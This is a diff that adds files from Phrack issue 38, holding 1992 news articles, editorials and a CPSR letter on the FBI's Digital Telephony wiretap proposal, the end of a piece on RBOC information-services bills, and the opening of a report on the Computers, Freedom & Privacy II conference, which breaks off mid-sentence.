+any government-granted monopoly will be forced out, to be replaced with
+politically-favored and politically-controllable socialized services.  Once
+again, America edges closer to the fascist system which has been so soundly
+rejected elsewhere.  When will we ever learn?
+
+We SHOULD all write to our Congressmen and Senators.  We should demand that
+they pass HR 3515 and S 2112, and keep them in force unless and until the RBOCs
+give up their local telephone monopolies and allow truly free competition --
+which means long after the monopolies are broken up, until the lingering
+advantages of the monopoly are dissipated.  Of course, the RBOCs could spin off
+entirely independent companies to provide information services -- with no
+common management and no favored treatment in data transmission over the other
+independent information services -- and I would cheer.  But so long as they
+have a chokehold on the primary _delivery vehicle_ for information services in
+America, their protestations for "free competition" ring incredibly hollow.
+
+
+Toby Nixon                      | Voice   +1-404-840-9200  Telex 151243420
+2595 Waterford Park Drive       | Fax     +1-404-447-0178  CIS   70271,404
+Lawrenceville, Georgia  30244   | BBS     +1-404-446-6336  AT&T    !tnixon
+USA                             | Internet                tnixon@hayes.com
+_______________________________________________________________________________
+
+ RHC Tactics Blamed For Failure Of Information Services Bill      April 1, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Communications Daily (Page 4)
+
+Rep. Cooper (D-Tenn.) said that his legislation to put conditions on RHC
+provision of information services (HR-3515) didn't have much chance of success
+>from time bill was introduced.  At panel discussion in Washington sponsored by
+National Press Forum, he said outlook for bill was "pretty grim," and that only
+hope for success would be if powerful committee chairman came to rescue. That's
+unlikely, he said.
+
+Cooper said he has about 48 co-sponsors for bill and Senate version (S-2112)
+has none.  In strong attack on RHCs, he said RHCs were responsible for lack of
+support and said members of Congress were intimidated by ad campaign against
+sponsors and co-sponsors of HR-3515 -- what he termed "a $150,000 penalty" for
+sponsoring legislation.  Cooper also criticized RHCs for sponsoring
+organizations without letting the public know of their interest, naming
+specifically Small Business for Advertising Choice, with headquarters in
+Washington.  He said he didn't mind legitimate "grass-roots" campaigns, but
+objected to "Astroturf campaigns."
+
+Disputes with RHCs broke into the open dramatically during Cooper's intense
+exchange with Southwestern Bell Vice-President Horace Wilkins, head of RHC's
+Washington office.  Cooper said that if RHCs were truly interested in providing
+information services, they would push for sponsorship of amendment to cable
+reregulation legislation to allow telco entry.  But Bells were "AWOL" on issue,
+Cooper said, even though there are members of House Telecom Subcommittee who
+would introduce such amendment if RHCs asked.  Wilkins said one House chairman,
+whom he declined to name, had told RHCs not to participate by pushing telco
+entry amendment.  Cooper responded:  "Who told you?"  He told Wilkins:  "You
+have the opportunity of a lifetime."
+
+Wilkins challenged Cooper:  "Why don't you take the lead" and introduce
+amendment?  Cooper replied he would do so if SWB would promise its support.
+Wilkins responded:  "If it's the right thing, we'll be with you."  Cooper
+replied that RHCs reportedly had been told not to push for such amendment, and
+neither he nor Wilkins would say which powerful House figure was against telco
+entry.  Without RHC backing, any introduction of telco entry amendment "would
+have zero support," Cooper said.  He said RHCs have backed away from active
+support of legislation to lift the MFJ manufacturing bar because they're afraid
+his measure might be attached to it.  Wilkins disagreed, saying RHCs were
+backing the bill.
+
+Mark MacCarthy, Cap/ABC vice-president, said the strongest argument against RHC
+entry into information services is that there's no evidence that "new and
+better information" would be provided to public.  RHCs could provide more
+efficient network architectures and distribution, he said, but "not better
+programming."  There's a historical example of "dark side of diversity" in
+which radio programmers once supported live symphony orchestras and provided
+quality content, MacCarthy said, but now, in an era in which there are many
+competitors, most stations obtain most of their programming free, on tape from
+record companies.
+_______________________________________________________________________________
diff --git a/phrack38/11.txt b/phrack38/11.txt
new file mode 100644
index 0000000..ee478a1
--- /dev/null
+++ b/phrack38/11.txt
@@ -0,0 +1,687 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 11 of 15
+
+                         The Digital Telephony Proposal
+
+                     by the Federal Bureau of Investigation
+
+
+ Phone Tapping Plan Proposed                                      March 6, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Associated Press
+
+               Law Enforcement Agencies Would Have Easier Access
+
+WASHINGTON -- The Bush administration wants you to pay a little more for
+telephone service to make it easier for the FBI or local police to listen in on
+the conversations of suspected criminals.
+
+The Justice Department is circulating a proposal in Congress that would force
+telephone companies to install state-of-the-art technology to accommodate
+official wiretaps.  And it would authorize the Federal Communications
+Commission to grant telephone companies rate increases to defray the cost.
+
+A copy of the legislation was obtained by The Associated Press.
+
+Attorney General William Barr discussed the proposal last week with Senator
+Ernest Hollings, D-S.C., chairman of the Senate Commerce Committee, which
+oversees the FCC according to congressional sources who spoke on condition of
+anonymity.
+
+Justice Department spokesman Paul McNulty refused to comment on the proposal.
+
+The bill was drafted by the FBI and the Justice Department in response to
+dramatic changes in telephone technology that make it difficult for traditional
+wiretapping methods to pick up conversations between two parties on a telephone
+line.
+
+The Justice Department's draft proposal states that the widespread use of
+digital transmission, fiber optics and other technologies "make it increasingly
+difficult for government agencies to implement lawful orders or authorizations
+to intercept communications in order to enforce the laws and protect the
+national security."
+
+The FBI has already asked Congress for $26.6 million in its 1993 fiscal year
+budget to help finance a five-year research effort to help keep pace with the
+changes in telephone technology.
+
+With the new technology that is being installed nationwide, police can no
+longer go to a telephone switching center and put wiretap equipment on
+designated lines.
+
+The advent of so-called digital transmission means that conversations are
+broken into bits of information and sent over phone lines and put back together
+at the end of the wire.
+
+The bill would give the FCC 180 days to devise rules and standards for
+telephone companies to give law enforcement agencies access to conversations
+for court-ordered wiretapping.
+
+The attorney general would be empowered to require that part of the rulemaking
+proceedings would be closed to the public, to protect the security of
+eavesdropping techniques used by law enforcement.
+
+Phone companies would have 180 days to make the necessary changes once the FCC
+issues the regulations.
+
+The bill would prohibit telephone companies and private exchanges from using
+equipment that doesn't comply with the new FCC technology standards.
+
+It would give the attorney general power to seek court injunctions against
+companies that violate the regulations and collect civil penalties of $10,000 a
+day.
+
+It also would give the FCC the power to raise telephone rates under its
+jurisdiction to reimburse carriers.  The FCC sets interstate long distance
+rates and a monthly end-user charge -- currently $2.50 -- that subscribers pay
+to be connected to the nationwide telephone network.
+
+Telephone companies will want to examine the proposal to determine its impact
+on costs, security of phone lines and the 180-day deadline for implementing the
+changes, said James Sylvester, director of infrastructure and privacy for Bell
+Atlantic.
+
+Though no cost estimates were made available, Sylvester estimated it could cost
+companies millions of dollars to make the required changes.  But rate hikes for
+individual customers would probably be quite small, he said.
+_______________________________________________________________________________
+
+ As Technology Makes Wiretaps More Difficult, F.B.I. Seeks Help   March 8, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Anthony Ramirez (New York Times)(Page I12)
+
+The Department of Justice says that advanced telephone equipment in wide use
+around the nation is making it difficult for law-enforcement agencies to
+wiretap the phone calls of suspected criminals.
+
+The Government proposed legislation requiring the nation's telephone companies
+to give law-enforcement agencies technical help with their eavesdropping.
+Privacy advocates criticized the proposal as unclear and open to abuse.
+
+In the past, the Federal Bureau of Investigation and other agencies could
+simply attach alligator clips and a wiretap device to the line hanging from a
+telephone pole.  Law-enforcement agents could clearly hear the conversations.
+That is still true of telephone lines carrying analog transmissions, the
+electronic signals used by the first telephones in which sounds correspond
+proportionally to voltage.
+
+But such telephone lines are being steadily replaced by high-speed, high-
+capacity lines using digital signals.  On a digital line, F.B.I. agents would
+hear only computer code or perhaps nothing at all because some digital
+transmissions are over fiber-optic lines that convert the signals to pulses of
+light.
+
+In addition, court-authorized wiretaps are narrowly written.  They restrict the
+surveillance to particular parties and particular topics of conversation over a
+limited time on a specific telephone or group of telephones.  That was
+relatively easy with analog signals.  The F.B.I. either intercepted the call or
+had the phone company re-route it to an F.B.I. location, said William A. Bayse,
+the assistant director in the technical services division of the F.B.I.
+
+But tapping a high-capacity line could allow access to thousands of
+conversations.  Finding the conversation of suspected criminals, for example,
+in a complex "bit stream" would be impossible without the aid of phone company
+technicians.
+
+There are at least 140 million telephone lines in the country and more than
+half are served in some way by digital equipment, according to the United
+States Telephone Association, a trade group.  The major arteries and blood
+vessels of the telecommunications network are already digital.  And the
+greatest part of the system, the capillaries of the network linking central
+telephone offices to residences and businesses, will be digital by the mid-
+1990s.
+
+Thousand Wiretaps
+
+The F.B.I. said there were 1,083 court-authorized wiretaps -- both new and
+continuing -- by Federal, state, and local law-enforcement authorities in 1990,
+the latest year for which data are available.
+
+Janlori Goldman, director of the privacy and technology project for the
+American Civil Liberties Union, said she had been studying the development of
+the F.B.I. proposal for several months.
+
+"We are not saying that this is not a problem that shouldn't be fixed," she
+said, "but we are concerned that the proposal may be overbroad and runs the
+risk that more information than is legally authorized will flow to the F.B.I.
+
+In a news conference in Washington on Friday, the F.B.I. said it was seeking
+only to "preserve the status quo" with its proposal so that it could maintain
+the surveillance power authorized by a 1968 Federal law, the Omnibus Crime
+Control and Safe Streets Act.  The proposal, which is lacking in many details
+is also designed to benefit state and local authorities.
+
+Under the proposed law, the Federal Communications Commission would issue
+regulations to telephone companies like the GTE Corporation and the regional
+Bell telephone companies, requiring the "modification" of phone systems "if
+those systems impede the Government's ability to conduct lawful electronic
+surveillance."
+
+In particular, the proposal mentions "providers of electronic communications
+services and private branch exchange operators," potentially meaning all
+residences and all businesses with telephone equipment.
+
+Frocene Adams, a security official with US West in Denver is the chairman of
+Telecommunications Security Association, which served as the liaison between
+the industry and the F.B.I.  "We don't know the extent of the changes required
+under the proposal," she said, but emphasized that no telephone company would
+do the actual wiretapping or other surveillance.
+
+Computer software and some hardware might have to be changed, Ms. Adams said,
+but this could apply to new equipment and mean relatively few changes for old
+equipment.
+_______________________________________________________________________________
+
+ FBI Wants To Ensure Wiretap Access In Digital Networks           March 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Communications Daily (Page 1)
+
+Proposed legislation being floated by Justice Dept. and FBI would require RHCs
+and equipment manufacturers to reengineer their products so that federal, state
+and local law enforcement agencies could wiretap digital communications systems
+of all types, Bureau said.  The proposal is a "collaborative effort" at
+"highest levels" involving law enforcement officials, government agencies,
+telephone executives and equipment manufacturers, said John Collingwood of
+FBI's office for legislative affairs.  It seeks to authorize FCC to grant
+telcos rate increases to defray the cost of reengineering the network to bring
+it into compliance.
+
+Associated Press reported Attorney General William Barr discussed the proposal
+last week with Sen. Hollings (D.-S.C.), chairman of Senate Commerce Committee;
+however, Committee staffers wouldn't comment.  Sources at FCC said they hadn't
+heard of the proposal, and neither had several RHCs we contacted.
+
+The bill was drafted by FBI and Department in response to what FBI Director
+William Sessions said were dramatic changes in telephone technology that have
+"outpaced" government ability to "technologically continue" its wiretapping
+activities.  James Kallestrom, FBI's chief of technical services section, said
+the bill wouldn't extend the Bureau's "court-authorized" electronic
+surveillance authority, but would seek simply to maintain status quo with
+digital technology.  New legislation is needed because law enforcement agencies
+no longer can go into a switching center and place a tap on single phone line,
+owing to complex digital multiplexing methods that often route number and voice
+signals over different channels.  Kallestrom said digital encoding also doesn't
+allow specific wiretap procedures, unlike analog systems, which use wave forms.
+Bureau wants telephone companies and equipment manufacturers to "build in" the
+ability to "give us what we want."  He said legislation wouldn't mandate how
+companies comply, only that they do.  William Bayse, chief of FBI's Technical
+Services Division, said the reengineering process would be "highly complex" but
+could be done at the software level.
+
+The FBI said it has been in contact with all telcos and "several" equipment
+manufacturers to get their input to determine feasibility.  Bayse said FBI had
+done preliminary cost analysis and estimated changes would run into "tens of
+millions," declining to narrow its estimates further.  The bill would give FCC
+the authority to allow RHCs to raise rates in order to make up the costs of
+implementing the new procedures.  Although FBI didn't have any specifics as to
+how FCC would go about setting those rates, or whether state PUCs would be
+involved in the process, they speculated that consumer telephone rates wouldn't
+go up more than 20 cents per month.
+
+The bill would give FCC 120 days to devise rules and standards for telcos to
+bring the public network into compliance.  However, the Commission isn't a
+standards-making body.  When questioned about the confusing role that the bill
+would assign to FCC, FBI's Collingwood said:  "The FCC is the agency that deals
+with phone companies, so we put them in charge."  He acknowledgedn that the
+bill "needs work" but said the FBI was "surprised" by the leak to press.
+However, he said that the language was in "very early stages" and that FBI
+wasn't averse to any changes that would bring swifter passage.
+
+Other confusing aspects of proposal:  (1) Short compliance time (120 days)
+seems to bypass FCC's traditional rulemaking procedures, in which the public is
+invited to submit comments; (2) No definition is given for "telecommunications
+equipment or technology;" (3) Provision that the attorney general direct that
+any FCC proceeding concerning "regulations, standards or registrations issued
+or to be issued" be closed to the public again would violate public comment
+procedures.
+
+FBI said legislation is the "least costly alternative" in addressing the issue.
+It said software modifications in equipment now would save "millions of
+dollars" over making changes several years from now.  However, the agency
+couldn't explain how software programming changes grew more expensive with
+time.  FBI's Kallestrom said:  "Changes made now can be implemented easier over
+time, rather than having to write massive software changes when the network
+gets much more complicated."  FBI already has asked Congress for $26.6 million
+in its proposed 1993 budget to help finance a 5-year research effort to help
+keep pace with changes in telephone technology.  Asked why that money couldn't
+be used to offset the price of government-mandated changes as the bill would
+require, FBI declined to comment, saying:  "We may look at having government
+offset some of the cost as the bill is modified."
+_______________________________________________________________________________
+
+ CPSR Letter on FBI Proposal                                      March 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By David Banisar (CPSR) <banisar@washofc.cpsr.org>
+
+CPSR and several other organizations sent the following letter to Senator
+Patrick Leahy regarding the FBI's recent proposal to undertake wire
+surveillance in the digital network.
+
+If you also believe that the FBI's proposal requires further study at a public
+hearing, contact Senator Hollings at the Senate Committee on Commerce.  The
+phone number is (202)224-9340.
+
+Dave Banisar,
+CPSR Washington Office
+====================================================
+
+
+March 9, 1992
+
+Chairman Patrick Leahy
+Senate Subcommittee on Law and Technology
+Committee on the Judiciary
+United States Senate
+Washington, DC  20510
+
+Dear Senator Leahy,
+
+     We are writing to you to express our continuing interest in communications
+privacy and cryptography policy.  We are associated with leading computer and
+telecommunication firms, privacy, civil liberties, and public interest
+organizations, as well as research institutions and universities.  We share a
+common concern that all policies regarding communications privacy and
+cryptography should be discussed at a public hearing where interested parties
+are provided an opportunity to comment or to submit testimony.
+
+     Last year we wrote to you to express our opposition to a Justice
+Department sponsored provision in the Omnibus Crime Bill, S. 266, which would
+have encouraged telecommunications carriers to provide a decrypted version of
+privacy-enhanced communications.  This provision would have encouraged the
+creation of "trap doors" in communication networks.  It was our assessment that
+such a proposal would have undermined the security, reliability, and privacy of
+computer communications.
+
+     At that time, you had also convened a Task Force on Privacy and Technology
+which looked at a number of communication privacy issues including S. 266.  The
+Task Force determined that it was necessary to develop a full record on the
+need for the proposal before the Senate acted on the resolution.
+
+     Thanks to your efforts, the proposal was withdrawn.
+
+     We also wish to express our appreciation for your decision to raise the
+issue of cryptography policy with Attorney General Barr at his confirmation
+hearing last year.  We are pleased that the Attorney General agreed that such
+matters should properly be brought before your Subcommittee for consideration.
+
+     We write to you now to ask that you contact the Attorney General and seek
+assurance that no further action on that provision, or a similar proposal, will
+be undertaken until a public hearing is scheduled.  We believe that it is
+important to notify the Attorney General at this point because of the current
+attempt by the administration to amend the Federal Communications Commission
+Reauthorization Act with provisions similar to those contained in S. 266.
+
+
+     We will be pleased to provide assistance to you and your staff.
+
+
+Sincerely yours,
+
+Marc Rotenberg,
+Computer Professionals for Social Responsibility
+
+David Peyton,
+ITAA
+
+Ira Rubenstein,
+Microsoft
+
+Jerry Berman,
+Electronic Frontier Foundation
+
+Michael Cavanaugh,
+Electronic Mail Association
+
+Martina Bradford,
+AT&T
+
+Evan Hendricks,
+US Privacy Council
+
+Professor Dorothy Denning,
+Georgetown University
+
+Professor Lance Hoffman,
+George Washington University
+
+Robert L. Park,
+American Physical Society
+
+Janlori Goldman,
+American Civil Liberties Union
+
+Whitfield Diffie,
+Sun Microsystems
+
+John Podesta,
+Podesta and Associates
+
+Kenneth Wasch,
+Software Publishers Association
+
+John Perry Barlow,
+Contributing Editor, Communications of the ACM
+
+David Johnson,
+Wilmer, Cutler & Pickering
+
+
+cc: Senator Joseph R. Biden, Jr
+    Senator Hank Brown
+    Senator Ernest F. Hollings
+    Senator Arlen Specter
+    Senator Strom Thurmond
+    Representative Don Edwards
+    Attorney General Barr
+    Chairman Sikes, FCC
+_______________________________________________________________________________
+
+ FBI, Phone Firms in Tiff Over Turning on the Taps               March 10, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By John Mintz (Washington Post)(Page C1)
+
+                    Technology Has Made Eavesdropping Harder
+
+The FBI says technology is getting ahead of taps.
+
+The bureau says the digital technology in new telephone networks is so
+complicated -- it translates voices into computerized blips, then retranslates
+them into voices at the other end -- that agents can't capture conversations.
+
+So the FBI wants a law requiring phone companies to re-engineer their new phone
+networks so the taps work again.
+
+But the phone companies warn that the proposal could raise ratepayers' monthly
+bills.
+
+And civil liberties groups say the technological changes sought by the FBI
+could have an unintended effect, making it easier for criminals, computer
+hackers and even rogue phone company employees to tap into phone networks.
+
+"We have grave concerns about these proposals," said Jim McGann, a spokesman
+for AT&T.  "They would have the effect of retarding introduction of new
+services and would raise prices."
+
+Bell Atlantic Corporation, owner of Chesapeake & Potomac Telephone Company
+here, said the changes could cost its own ratepayers as much as hundreds of
+millions of dollars.
+
+The cause of the FBI's concern is a new generation of digital technologies in
+which phone conversations are translated into the computer language of zeroes
+and ones, then bundled with other conversations for speedy transmission, and
+finally retransformed into voices.
+
+Another problem for the FBI is fiber-optic technology, in which conversations
+are changed into pulses of light zapped over hair-thin strands of glass.  The
+U.S. government has delayed sales of fiber-optic equipment to the former Soviet
+Union because of the difficulty of tapping it.
+
+The FBI proposed a law requiring phone companies to modify their networks to
+make wiretaps easier.  The agency would still have to obtain a court order to
+tap a line, as it does now.  It also proposed allowing the Federal
+Communications Commission to let the phone companies pass the costs on to
+consumers and letting the FCC consider the issues in closed-door hearings to
+keep secret the details of phone system security.
+
+"Without an ultimate solution, terrorists, violent criminals, kidnappers, drug
+cartels and other criminal organizations will be able to carry out their
+illegal activities using the telecommunications system without detection," FBI
+Director William S. Sessions said in a prepared statement.  "This proposal is
+critical to the safety of the American people and to law enforcement officers."
+
+In the past, investigators would get the phone company to make adjustments at
+switching facilities, or would place taps at junction boxes -- hard metal
+structures on concrete blocks in every neighborhood -- or even at telephone
+junction rooms in the basements of office and apartment buildings.
+
+But sometimes tappers get only bursts of electronic blipping.  The FBI said the
+new technologies have defeated wiretap attempts on occasion -- but it declined
+to provide details.
+
+To get the blips retranslated back into conversation, tappers have to place
+their devices almost right outside the targeted home or office.  Parking FBI
+trucks outside targets' houses "could put agents in danger, so it's not
+viable," said Bell Atlantic spokesman Kenneth A. Pitt.
+
+"We don't feel our ratepayers should pay that money" to retool networks, said
+Bill McCloskey, spokesman for BellSouth Corporation, a major phone company
+based in Atlanta.
+
+Since there are 150 million U.S. phone lines, a cost of $ 1 billion that's
+passed on to ratepayers could translate into about $ 6.60 per consumer,
+industry officials said.
+
+Rather than charge ratepayers, Pitt said, the government should pay for the
+changes.  Bell Atlantic prefers continued FBI and industry talks on the subject
+to a new law.
+
+The FBI proposes that within 120 days of enactment of the law it seeks, the FCC
+would issue regulations requiring technological changes in the phone system and
+that the modifications be made 60 days after that.  The FCC rarely moves on
+even the simplest matter in that time, and this could be one of the most
+complex technological questions facing the government, congressional and
+industry sources said.
+
+Given the huge variety of technologies that could be affected -- regular phone
+service, corporate data transmissions, satellite and microwave communications,
+and more -- one House staffer said Congress "will have to rent RFK Stadium" to
+hold hearings.
+
+Marc Rotenberg, a lawyer who has attended meetings with FBI and phone company
+officials on the proposal, said the FBI, by taking the issue to congressional
+communications committees, is trying to make an end run around the judiciary
+committees.
+
+Last year, the Senate Judiciary Committee, responding to civil libertarians'
+protests, killed an FBI proposal to require that encrypted communications --
+such as banks' secret data transmissions -- be made available in decoded form.
+
+Representative Edward J. Markey (D-Mass.), who chairs the House subcommittee
+handling the latest FBI proposal, said the plan has troubling overtones of "Big
+Brother" about it.
+_______________________________________________________________________________
+
+ Let's Blow the Whistle on FBI Phone-Tap Plan                    March 12, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Editorial taken from USA Today (Page 6A)
+
+OUR VIEW - Congress should disconnect this unneeded and dangerous eavesdropping
+scheme as soon as possible
+
+The FBI -- lambasted in the past for wiretapping and amassing files on
+thousands of "subversives" such as Martin Luther King -- seems determined to
+prove that consistency is a virtue.
+
+The Bureau wants phone companies to make costly changes that critics say could
+let agents eavesdrop on your phone calls without detection -- and boost your
+phone bill to pay for it.
+
+The FBI says that this new law is needed because it can't wiretap all calls
+transmitted with the new digital technology.  It also wants the public barred
+when it explains all this to Congress.
+
+Wisely, lawmakers show signs of balking.  They're already preparing for high-
+profile hearings on the proposal.
+
+Congress, though, should go much further.  It should pin the FBI's wiretap plan
+to the wall and use it for target practice.  Here are just a few of the spots
+at which to take aim:
+
+     *Rights:  The FBI says it is still would get court approval before
+               tapping, but experts say if the agency gets its way, electronic
+               eavesdropping would be far easier and perhaps untraceable.  The
+               FBI's plan, they say, could make a mockery of constitutional
+               rights to privacy and against unreasonable searches.
+
+     *Need:    Some phone companies say they are already meeting FBI wiretap
+               requirements and question whether the agency really needs a new
+               law -- or just would find it convenient.  The FBI says it can't
+               tap some digital transmissions -- but it hasn't given any
+               specifics.
+
+     *Honesty: The FBI tried to evade congressional review by financing its
+               plan with a charge to phone users.
+
+The bureau must have realized the reception this shady scheme could expect:  It
+tried to slip it though Congress' side door, avoiding the committees that
+usually oversee FBI operations.
+
+Over the decades, wiretaps have proved invaluable in snaring lawbreakers.  Used
+selectively and restrained by judicial oversight, they're a useful weapon,
+especially against organized crime.
+
+But if catching gangsters never should take precedence over the rights the
+Constitution guarantees the citizens who try to follow the law, not break it.
+_______________________________________________________________________________
+
+ Back to Smoke Signals?                                          March 26, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~
+ An editorial from The Washington Post
+
+The Justice Department spent years in court breaking up the nation's
+telecommunications monopoly in order to foster competition and technological
+advances.  Now the same department has gone to Congress asking that
+improvements in telecommunications technology be halted, and in some cases even
+reversed, in the name of law enforcement.  The problems facing the FBI are
+real, but the proposed solution is extreme and unacceptable on a number of
+grounds.
+
+Wiretaps  are an important tool in fighting crime, especially the kind of
+large-scale, complicated crime -- such as drug conspiracies, terrorism and
+racketeering -- that is the responsibility of the FBI.  When they are installed
+pursuant to court order, taps are perfectly legal and usually most productive.
+But advances in phone technology have been so rapid that the government can't
+keep up.  Agents can no longer just put a tap on phone company equipment a few
+blocks from the target and expect to monitor calls.  Communications occur now
+through regular and cellular phones via satellite and microwave, on fax
+machines and computers.  Information is transmitted in the form of computer
+digits and pulses of light through strands of glass, and none of this is easily
+intercepted or understood.
+
+The Justice Department wants to deal with these complications by forbidding
+them.  The department's proposal is to require the Federal Communications
+Commission to establish such standards for the industry "as may be necessary to
+maintain the ability of the government to lawfully intercept communications."
+Any technology now in use would have to be modified within 180 days, with the
+costs passed on to the rate payers.  Any new technology must meet the
+suitable-for-wiretap standard, and violators could be punished by fines of
+$10,000 a day.  As a final insult, commission proceedings concerning these
+regulations could be ordered closed by the attorney general.
+
+The civil liberties problems here are obvious, for the purposeful designing of
+telecommunications systems that can be intercepted will certainly lead to
+invasions of privacy by all sorts of individuals and organizations operating
+without court authorization.  Further, it is an assault on progress, on
+scientific endeavor and on the competitive position of American industry.  It's
+comparable to requiring Detroit to produce only automobiles that can be
+overtaken by faster police cars.  And it smacks of repressive government.
+
+The proposal has been drafted as an amendment rather than a separate bill, and
+there is some concern that it will be slipped into a bill that has already
+passed one house and be sent quietly to conference.  That would be
+unconscionable.  We believe, as the industry suggests, that the kind of
+informal cooperation between law enforcement agencies and telecommunications
+companies that has always characterized efforts in the past, is preferable to
+this stifling legislation. But certainly no proposal should be considered by
+Congress without open and extensive hearings and considerable debate.
+_______________________________________________________________________________
+
+ The FBI's Latest Idea: Make Wiretapping Easier                  April 19, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Anthony Ramirez (New York Times)(Section 4, Page 2)
+
+Civil libertarians reacted quickly last month when the Federal Bureau of
+Investigation proposed new wiretapping legislation to cope with advanced
+telephone equipment now being installed nationwide.
+
+The FBI, which has drafted a set of guidelines, but has as yet no sponsor in
+Congress, said the latest digital equipment was so complicated it would hinder
+the agency's pursuit of mobsters, terrorists and other criminals.  But civil
+liberties groups like the American Civil Liberties Union, joined by several
+major telephone companies like American Telephone and Telegraph Company,
+described the proposal as unclear, open to abuse and possibly retarding the
+pace of technological innovation.
+
+Civil libertarians fear a shift from a world where wiretaps are physically
+onerous to install, therefore forcing the FBI to think twice about their use,
+to a world where surveillance is so easy that a few pecks on an FBI key pad
+would result in a tap of anyone's telephone in the country.
+
+The inventive computer enthusiasts who call themselves hackers are also calling
+the legislation unnecessary. If teenagers can quickly cope with such equipment,
+they argue, so can the FBI.
+
+"The easier it is to use, the easier it is to abuse," said Eric Corley, editor
+of 2600 magazine, a quarterly publication "by and about computer hackers."
+
+According to the FBI, in 1990, the latest year for which data are available,
+there were 1,083 court-authorized wiretaps -- both new and continuing -- by
+Federal, state and local law-enforcement authorities. Robert Ellis Smith,
+publisher of Privacy Journal, said the relatively small number of wiretaps
+reflects the difficulty of obtaining judicial permission and installing the
+devices. Moreover, he said, many cases, including the John Gotti case, were
+solved with eavesdropping devices planted in rooms or on an informant.
+
+Besides, Mr. Smith said, complicated digital equipment shares similarities with
+obstacles free of technology.  "Having a criminal conversation on a digital
+fiber-optic line," he said, "is no different from taking a walk in the park and
+having the same conversation."  And no one, he added, would think of requiring
+parks to be more open to electronic surveillance.
+
+At issue are the latest wonders of the telecommunications age -- digital
+transmission and fiber-optic cables. In the standard analog transmission,
+changes in electrical voltage imitate the sound of a human voice.  To listen
+in, the FBI and other agencies attach a device to a line from a telephone pole.
+
+A Computer Hiss or Nothing
+
+Today phone systems are being modernized with high-speed, high-capacity digital
+lines in which the human voice is converted into computer code.  Moreover, a
+fiber-optic line in digital mode, which carries information as pulses of light,
+carries not only clear conversations but a myriad of them.  Using a wiretap on
+a digital line, FBI agents would hear only a computer hiss on a copper cable,
+nothing at all on a fiber-optic line.
+
+There are at least 140 million telephone lines in the country, and more than
+half are served in some way by digital equipment, according to the United
+States Telephone Association, a trade group.  However, less than 1 percent of
+the network is fiber optic.
+
+The legislation proposed by the FBI would, in effect, require the licensing of
+new telephone equipment by the Federal Government so the agency could wiretap
+it.  Telephone companies would have to modify computers and software so that
+agents could decipher the digital bit stream.  The cost of the modification
+would be passed on to rate payers.
+
+"Phone companies are worried about the sweep of this legislation," said Jerry
+Berman,  director of the Electronic Frontier Foundation, who solicited the
+support of the phone companies for a protest letter to Congress.  By requiring
+the FCC to clear new technology, innovation could be slowed, he said.  "We're
+not just talking about just local and long-distance calls," Mr. Berman said.
+"We're talking about CompuServe, Prodigy and other computer services,
+electronic mail, automatic teller machines and any change in them."
+
+Briefcase-Size Decoders
+
+One telecommunications equipment manufacturer said he was puzzled by the FBI
+proposal.  "The FBI already has a lot of technology to wiretap digital lines,"
+he said, on condition of anonymity.
+
+He said four companies, including such major firms as Mitel Corporation, a
+Canadian maker of telecommunications equipment, can design digital decoders to
+convert computer code back into voice.  A portable system about the size of a
+large briefcase could track and decode 36 simultaneous conversations.  A larger
+system, the size of a small refrigerator, could follow up to 1,000
+conversations.  All could be done without the phone company.
+
+James K. Kallstrom, the FBI's chief of technology, acknowledged that the agency
+was one of Mitel's largest customers, but said the equipment hackers and others
+describe would be "operationally unfeasible."
+
+The FBI was more worried about emerging technologies like personal
+communications networks and services like call forwarding.  "Even if we used
+the equipment the hackers say we should use," Mr. Kallstrom said, "all a
+criminal would have to do is call-forward a call or use a cellular telephone or
+wireless data transfer to defeat me."
+_______________________________________________________________________________
diff --git a/phrack38/12.txt b/phrack38/12.txt
new file mode 100644
index 0000000..e6d3434
--- /dev/null
+++ b/phrack38/12.txt
@@ -0,0 +1,294 @@
+                                ==Phrack Inc.==
+
+                Volume Four, Issue Thirty-Eight, File 12 of 15
+
+           PWN ^*^ PWN ^*^ PWN ^*^ { CFP-2 } ^*^ PWN ^*^ PWN ^*^ PWN
+           ^*^                                                   ^*^
+           PWN         P h r a c k   W o r l d   N e w s         PWN
+           ^*^         ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~         ^*^
+           PWN             Special Edition Issue Six             PWN
+           ^*^                                                   ^*^
+           PWN          Computers, Freedom, & Privacy II         PWN
+           ^*^                                                   ^*^
+           PWN                 March 18-20, 1992                 PWN
+           ^*^                                                   ^*^
+           PWN               Written by Max Nomad                PWN
+           ^*^                                                   ^*^
+           PWN ^*^ PWN ^*^ PWN ^*^ { CFP-2 } ^*^ PWN ^*^ PWN ^*^ PWN
+
+
+                        Computers, Freedom, & Privacy II
+        Random Notes and Mission X Telegraphs from the Nation's Capitol
+
+                                  by Max Nomad
+
+Originally, when I read the brochure on the second "Computers, Freedom, and
+Privacy Conference," I saw opportunity knocking at my door:  Three days at the
+Loew's L'Enfant Plaza Hotel in Washington, D.C. stalking around a series of
+meetings all geared toward telecommunications, as well as the high potential
+for mischief; techno-gurus, privacy advocates, computer outlaws, corporate
+bigwigs, and lastly feds, a few of which who were casually walking around with
+automatic weapons disguised as black tote-bags.  There was no telling what
+those hackers were capable of, I'm sure, so the beefed up security was
+necessary.
+
+Upon learning that Basil Rouland, Inc., an information systems security firm,
+had secured a press pass and transportation, my excitement grew.  I wasn't sure
+what kind of story I would bring back from the trip, or if I would find a
+unique story at all.  Fortunately, the conference topics provided dozens of
+angles to take on, more than I care list.  My previous article and notes alone
+on the event were upwards of 25k, mostly filled with mundane excerpts and
+quotes from various panelists.  If you're interested in a blow-by-blow account
